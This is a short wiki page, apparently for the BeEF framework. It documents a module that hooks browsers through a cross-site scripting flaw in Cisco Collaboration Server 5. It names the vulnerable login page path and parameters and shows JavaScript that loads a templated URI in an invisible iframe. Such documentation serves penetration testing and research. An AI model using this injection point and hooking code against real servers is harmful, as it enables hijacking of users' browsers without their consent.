Skip to content

Module: Cisco Collaboration Server 5 XSS

Haoxi Tan edited this page Jan 9, 2020 · 2 revisions

Summary

  • Objective: hook Cisco Collaboration Server 5 using XSS

  • Authors: bcoles, s4squatch

  • Browsers: All

  • Code

Internal Working

Use an invisible iframe to exploit XSS in Cisco Collaboration Server 5.

Vulnerable path is http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=

var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');

var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
cisco_collaboration_iframe.setAttribute('src', uri);

Feedback

Clone this wiki locally